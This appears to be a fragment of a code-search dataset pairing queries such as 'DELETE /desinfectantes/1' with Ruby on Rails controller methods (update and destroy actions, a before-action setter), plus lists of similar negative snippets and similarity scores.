"def update\n respond_to do |format|\n if @consulta_viaje.update(consulta_viaje_params)\n format.html { redirect_to @consulta_viaje, notice: 'Consulta viaje was successfully updated.' }\n format.json { render :show, status: :ok, location: @consulta_viaje }\n else\n format.html { render :edit }\n format.json { render json: @consulta_viaje.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n pai = params[:pai] ? Conta.find_by_id(params[:pai]): nil\n \n respond_to do |format|\n if @conta.update(nome: conta_params[:nome], status: conta_params[:status], pai: pai) \n #format.json { render :show, status: :ok, location: @conta }\n format.json { render json: @conta.to_json, status: :ok }\n else \n format.json { render json: @conta.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\n @empresa_servicio = EmpresaServicio.find(params[:id])\n respond_to do |format|\n if @empresa_servicio.update_attributes(params[:empresa_servicio])\n\n format.html { redirect_to empresa_empresa_servicios_path, notice: \"Los datos del servicio fueron actualizados para la empresa #{@empresa_servicio.empresa.nombre_empresa}\"}\n \n else\n format.html { render action: \"edit\" }\n format.json { render json: @empresa_servicio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @tipo_negocio = TipoNegocio.find(params[:id])\n\n respond_to do |format|\n if @tipo_negocio.update_attributes(params[:tipo_negocio])\n format.html { redirect_to @tipo_negocio, notice: 'Tipo negocio was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @tipo_negocio.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @datos_estudiante.update(datos_estudiante_params)\n format.html { redirect_to @datos_estudiante, notice: 'Datos estudiante was successfully updated.' }\n format.json { render :show, status: :ok, location: @datos_estudiante }\n else\n format.html { render :edit }\n format.json { render json: @datos_estudiante.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @objetivo.update(objetivo_params)\n format.html { redirect_to [@mision, @objetivo], notice: 'Objetivo was successfully updated.' }\n format.json { render :show, status: :ok, location: [@mision, @objetivo] }\n else\n format.html { render :edit }\n format.json { render json: [@mision, @objetivo].errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @contato.update(contato_params)\n format.html { redirect_to @contato, flash: { success: 'Contato was successfully updated.' } }\n format.json { render :show, status: :ok, location: @contato }\n else\n format.html { render :edit }\n format.json { render json: @contato.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @solicitacoes_avaliacoes_servico.update(solicitacoes_avaliacoes_servico_params)\n format.html { redirect_to @solicitacoes_avaliacoes_servico, notice: 'Solicitacoes avaliacoes servico was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @solicitacoes_avaliacoes_servico.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @recurso = Recurso.find(params[:id])\n\n respond_to do |format|\n if @recurso.update_attributes(params[:recurso])\n format.html { redirect_to @recurso, notice: 'O recurso de auto de infração foi atualizado com sucesso.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @recurso.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @solicitante.update(solicitante_params)\n format.html { redirect_to @solicitante, notice: 'Solicitante was successfully updated.' }\n format.json { render :show, status: :ok, location: @solicitante }\n else\n format.html { render :edit }\n format.json { render json: @solicitante.errors, status: :unprocessable_entity }\n end\n end\n end",
"def patch(path, data)\n request 'PATCH', path, body: data.to_json\n end",
"def rest_edit(path, options={}, &blk)\n callback = Proc.new { |*args|\n @object = yield(*args) or pass\n rest_params.each { |k, v| @object.send :\"#{k}=\", v unless k == 'id' }\n\n return 400, @object.errors.to_json unless @object.valid?\n\n @object.save\n rest_respond @object\n }\n\n # Make it work with `Backbone.emulateHTTP` on.\n put path, &callback\n post path, &callback\n end",
"def rest_edit(path, options={}, &blk)\n callback = Proc.new { |*args|\n @object = yield(*args) or pass\n rest_params.each { |k, v| @object.send :\"#{k}=\", v unless k == 'id' }\n\n return 400, @object.errors.to_json unless @object.valid?\n\n @object.save\n rest_respond @object\n }\n\n # Make it work with `Backbone.emulateHTTP` on.\n put path, &callback\n post path, &callback\n end",
"def update\n respond_to do |format|\n if @telefono.update(telefono_params)\n format.html { redirect_to @telefono, notice: 'Telefono was successfully updated.' }\n format.json { render :show, status: :ok, location: @telefono }\n else\n format.html { render :edit }\n format.json { render json: @telefono.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @informacao.update(informacao_params)\n format.html { redirect_to @informacao, notice: 'Informacao was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @informacao.errors, status: :unprocessable_entity }\n end\n end\n end"
] |
[
"0.6500287",
"0.6442837",
"0.64224625",
"0.63979876",
"0.6375225",
"0.63302875",
"0.6328817",
"0.6291803",
"0.62866145",
"0.6285924",
"0.62819654",
"0.6257505",
"0.6249846",
"0.6248789",
"0.62433636",
"0.62423736",
"0.6232456",
"0.62319374",
"0.62314755",
"0.6229124",
"0.6226332",
"0.62218",
"0.620393",
"0.61964107",
"0.6184693",
"0.61767244",
"0.61711985",
"0.6170389",
"0.616861",
"0.6159405",
"0.61550206",
"0.61500376",
"0.6143508",
"0.61402595",
"0.6137728",
"0.61361307",
"0.61332726",
"0.6132605",
"0.61285025",
"0.6121173",
"0.61195344",
"0.6117962",
"0.6115188",
"0.6113792",
"0.6113208",
"0.6111886",
"0.611059",
"0.6107253",
"0.6104095",
"0.61036676",
"0.6102444",
"0.60966426",
"0.60956466",
"0.6091356",
"0.6091166",
"0.60900724",
"0.6087772",
"0.6086336",
"0.6085748",
"0.6084032",
"0.6083048",
"0.6081596",
"0.6080739",
"0.60803163",
"0.60797787",
"0.6079679",
"0.6078172",
"0.60770106",
"0.60741025",
"0.6072443",
"0.60716283",
"0.6068664",
"0.6067449",
"0.6067421",
"0.6063459",
"0.60624135",
"0.6061612",
"0.6060432",
"0.60569465",
"0.6053316",
"0.60533106",
"0.60524726",
"0.60456043",
"0.60453826",
"0.6044554",
"0.604255",
"0.6038994",
"0.6036832",
"0.6028904",
"0.6028694",
"0.6026297",
"0.60251683",
"0.60215473",
"0.6021547",
"0.6021065",
"0.60207933",
"0.6018826",
"0.6018826",
"0.60181904",
"0.6017167"
] |
0.6531241
|
0
|
DELETE /desinfectantes/1
DELETE /desinfectantes/1.json
|
def destroy
@desinfectante.destroy
respond_to do |format|
format.html { redirect_to desinfectantes_url, notice: 'Desinfectante was successfully destroyed.' }
format.json { head :no_content }
end
end
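
A minimal sketch, assuming standard Rails scaffolding, of how the destroy action above is reached: a plain `resources` entry maps the DELETE verb to `desinfectantes#destroy`. The routes file and the curl invocation below are illustrative assumptions, not part of this record.

```ruby
# config/routes.rb -- assumed RESTful wiring (not taken from the record)
Rails.application.routes.draw do
  # Generates DELETE /desinfectantes/:id => desinfectantes#destroy,
  # matching the "DELETE /desinfectantes/1(.json)" query above.
  resources :desinfectantes
end

# Hypothetical JSON invocation against a local dev server:
#   curl -X DELETE http://localhost:3000/desinfectantes/1.json
# The action then responds with 204 No Content via `head :no_content`.
```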
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def destroy\n @asignatura.destroy\n respond_to do |format|\n format.json { head :no_content }\n end\n end",
"def delete\n client.delete(\"/#{id}\")\n end",
"def destroy\n @detalle = Detalle.find(params[:id])\n @detalle.destroy\n\n respond_to do |format|\n format.html { redirect_to detalles_url }\n format.json { head :no_content }\n end\n end",
"def delete\n render :json => @fiestas.delete_at(params[:id].to_i)\n end",
"def destroy\n @descuento = Descuento.find(params[:id])\n @descuento.destroy\n\n respond_to do |format|\n format.html { redirect_to descuentos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @visitante.destroy\n respond_to do |format|\n format.html { redirect_to visitantes_url, notice: 'Visitante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detalle.destroy\n respond_to do |format|\n format.html { redirect_to detalles_url, notice: 'Detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @datos_insumos_reactivo.destroy\n respond_to do |format|\n format.html { redirect_to datos_insumos_reactivos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @datos_estudiante.destroy\n respond_to do |format|\n format.html { redirect_to datos_estudiantes_url, notice: 'Datos estudiante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @respuesta = Respuesta.find(params[:id])\n @respuesta.destroy\n\n respond_to do |format|\n format.html { redirect_to respuestas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @unidad.destroy\n respond_to do |format|\n format.html { redirect_to unidades_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @donante.destroy\n respond_to do |format|\n format.html { redirect_to donantes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @estado_despacho.destroy\n respond_to do |format|\n format.html { redirect_to estado_despachos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @solicitud.destroy\n respond_to do |format|\n format.html { redirect_to solicitudes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @dato = Dato.find(params[:id])\n @dato.destroy\n\n respond_to do |format|\n format.html { redirect_to datos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @datosgenerale.destroy\n respond_to do |format|\n format.html { redirect_to datosgenerales_url }\n format.json { head :no_content }\n end\n end",
"def delete path\n make_request(path, \"delete\", {})\n end",
"def destroy\n @humanidades1 = Humanidades1.find(params[:id])\n @humanidades1.destroy\n\n respond_to do |format|\n format.html { redirect_to humanidades1s_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @servicio = Servicio.find(params[:id])\n @servicio.destroy\n\n respond_to do |format|\n format.html { redirect_to servicios_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @cantante.destroy\n respond_to do |format|\n format.html { redirect_to cantantes_url, notice: 'Cantante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @cargo_eleicao = CargoEleicao.find(params[:id])\n @cargo_eleicao.destroy\n\n respond_to do |format|\n format.html { redirect_to cargo_eleicaos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fulcliente = Fulcliente.find(params[:id])\n @fulcliente.destroy\n\n respond_to do |format|\n format.html { redirect_to fulclientes_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @contador.destroy\n respond_to do |format|\n format.html { redirect_to contadors_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detalle_documento_de_compra.destroy\n respond_to do |format|\n format.html { redirect_to :back, notice: 'Linea eliminada' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @conta.destroy\n params[:id] = nil\n respond_to do |format|\n format.html { redirect_to contas_path, notice: @@titulo + t('msg.remove') }\n format.json { head :no_content }\n end\n end",
"def destroy\n @asignatura = Asignatura.find(params[:id])\n @asignatura.destroy\n\n respond_to do |format|\n format.html { redirect_to asignaturas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @asignatura = Asignatura.find(params[:id])\n @asignatura.destroy\n\n respond_to do |format|\n format.html { redirect_to asignaturas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @indicativo = Indicativo.find(params[:id])\n @indicativo.destroy\n\n respond_to do |format|\n format.html { redirect_to indicativos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @etiquetum.destroy\n respond_to do |format|\n format.html { redirect_to etiqueta_url, notice: 'Etiqueta borrada!' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @ficha = Ficha.find(params[:id])\n @ficha.destroy\n\n respond_to do |format|\n format.html { redirect_to fichas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @estado_remate.destroy\n respond_to do |format|\n format.html { redirect_to estado_remates_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @oficio.destroy\n respond_to do |format|\n format.html { redirect_to oficios_url, notice: 'Oficio eliminado exitosamente.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @especialidad.destroy\n respond_to do |format|\n format.html { redirect_to especialidads_url, notice: 'Servicio eliminado exitosamente.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @deuda = Deuda.find(params[:id])\n @deuda.destroy\n\n respond_to do |format|\n format.html { redirect_to deudas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @informacao_ged.destroy\n respond_to do |format|\n format.html { redirect_to informacoes_ged_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n #--ADICIONADO\n @cliente.perfilclientes.destroy\n #--ADICIONADO\n @cliente.destroy\n respond_to do |format|\n format.html { redirect_to clientes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @concedente.destroy\n respond_to do |format|\n format.html { redirect_to concedentes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @solicitante.destroy\n respond_to do |format|\n format.html { redirect_to solicitantes_url, notice: 'Solicitante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @desafio.destroy\n respond_to do |format|\n format.html { redirect_to desafios_url, notice: 'Desafio was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @estatuto = Estatuto.find(params[:id])\n @estatuto.destroy\n\n respond_to do |format|\n format.html { redirect_to estatutos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @asociado = Asociado.find(params[:id])\n @asociado.destroy\n\n respond_to do |format|\n format.html { redirect_to asociados_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @servico_pacote.destroy\n respond_to do |format|\n format.html { redirect_to servico_pacotes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fornecedor.destroy\n addlog(\"Fornecedor apagado\")\n respond_to do |format|\n format.html { redirect_to fornecedores_url, notice: 'Fornecedor apagado com sucesso.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @veiculo = Veiculo.find(params[:id])\n @veiculo.destroy\n\n respond_to do |format|\n format.html { redirect_to veiculos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @ficha_recinto.destroy\n respond_to do |format|\n format.html { redirect_to ficha_recintos_url, notice: 'Ficha recinto was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @contatos_cliente.destroy\n respond_to do |format|\n format.html { redirect_to contatos_clientes_url, notice: 'Contatos cliente was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detalhe.destroy\n respond_to do |format|\n format.html { redirect_to detalhes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @solicitud_servicio = SolicitudServicio.find(params[:id])\n @solicitud_servicio.destroy\n\n respond_to do |format|\n format.html { redirect_to solicitudes_servicios_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @cliente.destroy\n respond_to do |format|\n format.html { redirect_to clientes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @detalle_factura.destroy\n respond_to do |format|\n format.html { redirect_to detalle_facturas_url, notice: 'Detalle factura was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @serv_adicionale = ServAdicionale.find(params[:id])\n @serv_adicionale.destroy\n\n respond_to do |format|\n format.html { redirect_to serv_adicionales_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @sitio_entrega = SitioEntrega.find(params[:id])\n @sitio_entrega.destroy\n\n respond_to do |format|\n format.html { redirect_to sitio_entregas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fertilizante.destroy\n respond_to do |format|\n format.html { redirect_to fertilizantes_url, notice: 'Fertilizante was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @descuento_adicional.destroy\n respond_to do |format|\n format.html { redirect_to descuento_adicionals_url, notice: 'Descuento adicional fue eliminado exitosamente.' }\n format.json { head :no_content }\n end\n end",
"def delete\n request(:delete)\n end",
"def destroy\n @antecedente = Antecedente.find(params[:id])\n @antecedente.destroy\n\n respond_to do |format|\n format.html { redirect_to antecedentes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @trein_consul_comercial.destroy\n respond_to do |format|\n format.html { redirect_to trein_consul_comercials_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @reconocimiento = Reconocimiento.find(params[:id])\n @reconocimiento.destroy\n\n respond_to do |format|\n format.html { redirect_to reconocimientos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @safra_verdoso = SafraVerdoso.find(params[:id])\n @safra_verdoso.destroy\n\n respond_to do |format|\n format.html { redirect_to \"/safra_produtos/#{@safra_verdoso.safra_produto_id}/descontos\"}\n format.json { head :no_content }\n end\n end",
"def destroy\n @concedente = Concedente.find(params[:id])\n @concedente.destroy\n\n respond_to do |format|\n format.html { redirect_to concedentes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @objeto.destroy\n respond_to do |format|\n format.html { redirect_to referencia_bases_url, notice: \"Referencia base was successfully destroyed.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @respuesta = Respuesta.find(params[:id])\n @respuesta.destroy\n\n head :no_content\n end",
"def destroy\n @tarifas_servicio.destroy\n respond_to do |format|\n format.html { redirect_to tarifas_servicios_url, notice: 'Tarifas servicio Fue destruido con éxito.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @diemtrentuyen = Diemtrentuyen.find(params[:id])\n @diemtrentuyen.destroy\n\n respond_to do |format|\n format.html { redirect_to diemtrentuyens_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @respuestum.destroy\n respond_to do |format|\n format.html { redirect_to comentarios_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @sugerencia = Sugerencia.find(params[:id])\n @sugerencia.destroy\n\n respond_to do |format|\n format.html { redirect_to sugerencias_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @inicio.destroy\n respond_to do |format|\n format.html { redirect_to inicios_url, notice: 'Inicio was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def delete(path)\n RestClient.delete request_base+path\n end",
"def destroy\n @interventoriasfecha = Interventoriasfecha.find(params[:id])\n @interventoriasfecha.destroy\n\n respond_to do |format|\n format.html { redirect_to(interventoriasfechas_url) }\n format.xml { head :ok }\n end\n end",
"def destroy\n @prueba_json.destroy\n respond_to do |format|\n format.html { redirect_to prueba_jsons_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n contrato = @fatura.contrato\n @fatura.destroy\n respond_to do |format|\n format.html { redirect_to contrato, notice: 'Fatura excluída com sucesso.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @contenu_vente.destroy\n respond_to do |format|\n format.html { redirect_to contenu_ventes_url, notice: 'Contenu vente was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @tipo_convenio = TipoConvenio.find(params[:id])\n @tipo_convenio.destroy\n\n respond_to do |format|\n format.html { redirect_to tipo_convenios_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @depoevento = Depoevento.find(params[:id])\n @depoevento.destroy\n\n respond_to do |format|\n format.html { redirect_to depoeventos_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @tipo_unidad.destroy\n respond_to do |format|\n format.html { redirect_to tipo_unidades_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @asiento = Asiento.find(params[:id])\n @asiento.destroy\n\n respond_to do |format|\n format.html { redirect_to asientos_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @item_de_despesa.destroy\n addlog(\"Item de despesa apagado\")\n respond_to do |format|\n format.html { redirect_to itens_de_despesa_url, notice: 'Item de despesa apagado com sucesso.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @restaurantes_proximo.destroy\n respond_to do |format|\n format.html { redirect_to restaurantes_proximos_url, notice: 'Restaurantes proximo was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @solicitud.destroy\n respond_to do |format|\n format.html { redirect_to solicituds_url, notice: \"Solicitud was successfully destroyed.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @solicitud.destroy\n respond_to do |format|\n format.html { redirect_to solicituds_url, notice: 'Solicitud was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @interessado.destroy\n respond_to do |format|\n format.html { redirect_to interessados_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @estudiante = Estudiante.find(params[:id])\n @estudiante.destroy\n\n respond_to do |format|\n format.html { redirect_to estudiantes_url, :notice => \"#{@estudiante.persona.nombre_completo} eliminado\" }\n format.json { head :no_content }\n end#do\n end",
"def destroy\n @nota_tecnica.destroy\n respond_to do |format|\n format.html { redirect_to nota_tecnicas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @chaine = Chaine.find(params[:id])\n @chaine.destroy\n\n respond_to do |format|\n format.html { redirect_to chaines_url }\n format.json { head :no_content }\n end\n end",
"def destroy\r\n @fabricante.destroy\r\n respond_to do |format|\r\n format.html { redirect_to fabricantes_url, notice: 'Fabricante excluída com sucesso.' }\r\n format.json { head :no_content }\r\n end\r\n end",
"def destroy\n @lista_contato = ListaContato.find(params[:id])\n @lista_contato.destroy\n\n respond_to do |format|\n format.html { redirect_to listas_contato_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @ordenes_consumos_detalle.destroy\n respond_to do |format|\n format.html { redirect_to ordenes_consumos_detalles_url, notice: 'Ordenes consumos detalle was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @cliente = Cliente.find(params[:id])\n @cliente.destroy\n\n respond_to do |format|\n format.html { redirect_to clientes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @cliente = Cliente.find(params[:id])\n @cliente.destroy\n\n respond_to do |format|\n format.html { redirect_to clientes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @cliente = Cliente.find(params[:id])\n @cliente.destroy\n\n respond_to do |format|\n format.html { redirect_to clientes_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n# redirect_to activacionclientets_path # ted esto para evitar que borren por la web. ok. Que valla al index. provisional ok.\n \n #@activacionclientet.destroy\n respond_to do |format|\n format.html { redirect_to activacionclientets_url, notice: 'Activacionclientes no se puede eliminar por esta via. Contacte el administrador.' } # ted esto para evitar que borren por la web\n format.json { head :no_content }\n end\n end",
"def delete\n unless possui_acesso?()\n return\n end\n @aviso = Aviso.find(params[:id])\n @aviso.destroy\n\n respond_to do |format|\n format.html { redirect_to avisos_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @objeto.destroy\n respond_to do |format|\n format.html { redirect_to tipo_referencia_bases_url, notice: \"Tipo referencia base was successfully destroyed.\" }\n format.json { head :no_content }\n end\n end",
"def destroy\n @fisier.destroy\n respond_to do |format|\n format.html { redirect_to root_path }\n format.json { head :no_content }\n end\n end",
"def destroy\n @asiento_de_servicio.destroy\n respond_to do |format|\n format.html { redirect_to asiento_de_servicios_url, notice: 'Asiento de servicio was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @venta = Venta.find(params[:id])\n @venta.destroy\n\n respond_to do |format|\n format.html { redirect_to ventas_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @seguidore = Seguidore.find(params[:id])\n @seguidore.destroy\n\n respond_to do |format|\n format.html { redirect_to seguidores_url }\n format.json { head :ok }\n end\n end",
"def destroy\n @consulta_viaje.destroy\n respond_to do |format|\n format.html { redirect_to consulta_viajes_url, notice: 'Consulta viaje was successfully destroyed.' }\n format.json { head :no_content }\n end\n end",
"def destroy\n @humanidades2 = Humanidades2.find(params[:id])\n @humanidades2.destroy\n\n respond_to do |format|\n format.html { redirect_to humanidades2s_url }\n format.json { head :no_content }\n end\n end",
"def destroy\n @rango_fecha.destroy\n respond_to do |format|\n format.html { redirect_to rango_fechas_url, notice: 'Rango fecha was successfully destroyed.' }\n format.json { head :no_content }\n end\n end"
] |
[
"0.71394247",
"0.7127553",
"0.71198034",
"0.70285964",
"0.7027966",
"0.70126766",
"0.7010169",
"0.7007926",
"0.69764686",
"0.69739956",
"0.6956925",
"0.69524306",
"0.6950972",
"0.6937087",
"0.693446",
"0.6929953",
"0.6928403",
"0.69081795",
"0.6901356",
"0.6900193",
"0.68996346",
"0.6898617",
"0.6898449",
"0.68924767",
"0.6890246",
"0.68873423",
"0.68873423",
"0.6885539",
"0.68849844",
"0.6883127",
"0.68818337",
"0.6881071",
"0.6879052",
"0.6873922",
"0.6870483",
"0.68667454",
"0.6863315",
"0.68606305",
"0.6859344",
"0.6858163",
"0.6854766",
"0.68542117",
"0.68518305",
"0.6851827",
"0.6845595",
"0.6845405",
"0.68432313",
"0.68431956",
"0.6841108",
"0.6839843",
"0.68359506",
"0.6832926",
"0.6831637",
"0.68278646",
"0.68264467",
"0.6825432",
"0.68253624",
"0.6825233",
"0.6819566",
"0.681824",
"0.68140733",
"0.6813805",
"0.6812444",
"0.6810873",
"0.6810699",
"0.6809655",
"0.6809562",
"0.6809521",
"0.68074375",
"0.6806887",
"0.6806699",
"0.68048036",
"0.6802241",
"0.6801146",
"0.67992413",
"0.6797494",
"0.6796613",
"0.67965806",
"0.6796294",
"0.6795666",
"0.6795055",
"0.6794118",
"0.67939633",
"0.67911726",
"0.6790165",
"0.67901206",
"0.6787588",
"0.6784273",
"0.6784273",
"0.6784273",
"0.6781501",
"0.67809445",
"0.6780354",
"0.6776594",
"0.6776063",
"0.67747194",
"0.6771026",
"0.6770618",
"0.6768446",
"0.67677647"
] |
0.7309257
|
0
|
Use callbacks to share common setup or constraints between actions.
|
def set_desinfectante
@desinfectante = Desinfectante.find(params[:id])
end
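
A minimal sketch, assuming standard Rails scaffolding, of how this private setter is shared across actions via `before_action`; the controller class and the `only:` action list are assumptions, not part of this record.

```ruby
# Hypothetical controller context (assumed, not from the record)
class DesinfectantesController < ApplicationController
  # Runs set_desinfectante before each listed action, so every one of
  # them can rely on @desinfectante already being loaded from params[:id].
  before_action :set_desinfectante, only: [:show, :edit, :update, :destroy]

  private

  # Use callbacks to share common setup or constraints between actions.
  def set_desinfectante
    @desinfectante = Desinfectante.find(params[:id])
  end
end
```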
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def set_required_actions\n # TODO: check what fields change to asign required fields\n end",
"def action_hook; end",
"def run_actions; end",
"def define_action_hook; end",
"def actions; end",
"def define_action_helpers\n if super && action == :save\n @instance_helper_module.class_eval do\n define_method(:valid?) do |*args|\n self.class.state_machines.fire_event_attributes(self, :save, false) { super(*args) }\n end\n end\n end\n end",
"def add_actions; end",
"def callbacks; end",
"def callbacks; end",
"def setup *actions, &proc\n (@setup_procs ||= []) << [proc, actions.size > 0 ? actions : [:*]]\n end",
"def define_action_helpers; end",
"def post_setup\n end",
"def action_methods; end",
"def action_methods; end",
"def action_methods; end",
"def before_setup; end",
"def action_run\n end",
"def execute(setup)\n @action.call(setup)\n end",
"def define_action_helpers?; end",
"def set_actions\n actions :all\n end",
"def action_done(action)\n dispatch = { :migrate => :done_migrating, :map => :done_mapping, :reduce =>\n :done_reducing, :finalize => :done_finalizing } \n self.send dispatch[action[:action]], action\n end",
"def dependencies action, &block\n @actions.each do |other|\n if action[:requires].include? other[:provide]\n block.call other\n end\n end\n end",
"def setup!\n return unless @setup_procs\n http_actions = actions\n @setup_procs.each do |setup_proc|\n proc, actions = setup_proc\n @setup__actions = actions.map do |action|\n\n action.is_a?(Regexp) ?\n http_actions.select { |a| a.to_s =~ action } :\n action.is_a?(String) && action =~ /\\A\\./ ?\n http_actions.map { |a| a.to_s << action if format?(a).include?(action) }.compact :\n action\n\n end.flatten\n self.class_exec &proc\n @setup__actions = nil\n end\n @setup_procs = nil\n end",
"def before_actions(*logic)\n self.before_actions = logic\n end",
"def setup_handler\n end",
"def set_action(opts)\n opts = check_params(opts,[:actions])\n super(opts)\n end",
"def setup(action)\n @targets.clear\n unless action.item.target_filters.empty?\n @targets = SES::TargetManager.make_targets(action)\n else\n item = action.item\n if item.for_opponent?\n @targets = $game_troop.alive_members\n elsif item.for_dead_friend?\n @targets = $game_party.battle_members.select { |actor| actor.dead? }\n else\n $game_party.battle_members.select { |actor| actor.alive? }\n end\n end\n @item_max = @targets.size\n create_contents\n refresh\n show\n activate\n end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def workflow\n end",
"def revisable_shared_setup(args, block)\n class << self\n attr_accessor :revisable_options\n end\n options = args.extract_options!\n self.revisable_options = Options.new(options, &block)\n \n self.send(:include, Common)\n self.send(:extend, Validations) unless self.revisable_options.no_validation_scoping?\n self.send(:include, WithoutScope::QuotedColumnConditions)\n end",
"def setup\n @action = SampleActionAndroid.new(os_name: 'android',\n app_name: APP_PATH)\n end",
"def before(action)\n invoke_callbacks *self.class.send(action).before\n end",
"def process_action(...)\n send_action(...)\n end",
"def before_dispatch(env); end",
"def after_actions(*logic)\n self.after_actions = logic\n end",
"def setup\n # override and do something appropriate\n end",
"def setup(client)\n return unless @setup\n actions = @setup['setup'].select { |action| action['do'] }.map { |action| Action.new(action['do']) }\n actions.each do |action|\n action.execute(client)\n end\n self\n end",
"def setup(_context)\n end",
"def setup(resources) ; end",
"def validate_actions\n errors.add(:base, :should_give_at_least_one_action) if !manage? && !forecasting? && !read? && !api?\n end",
"def setup\n @resource_config = {\n :callbacks => {\n :before_create => nil,\n :after_create => nil,\n :before_update => nil,\n :after_update => nil,\n :before_destroy => nil,\n :after_destroy => nil,\n },\n :child_assoc => nil,\n :model => nil,\n :parent => nil,\n :path => nil,\n :permission => {},\n :properties => {},\n :relation => {\n :create => nil,\n :delete => nil,\n },\n :roles => nil,\n }\n end",
"def determine_valid_action\n\n end",
"def process_shared\n handle_taxes\n handle_shippings\n create_adjustments_from_params\n handle_status\n handle_inventory_refunds\n handle_payment_transactions\n order.updater.update\n end",
"def startcompany(action)\n @done = true\n action.setup\n end",
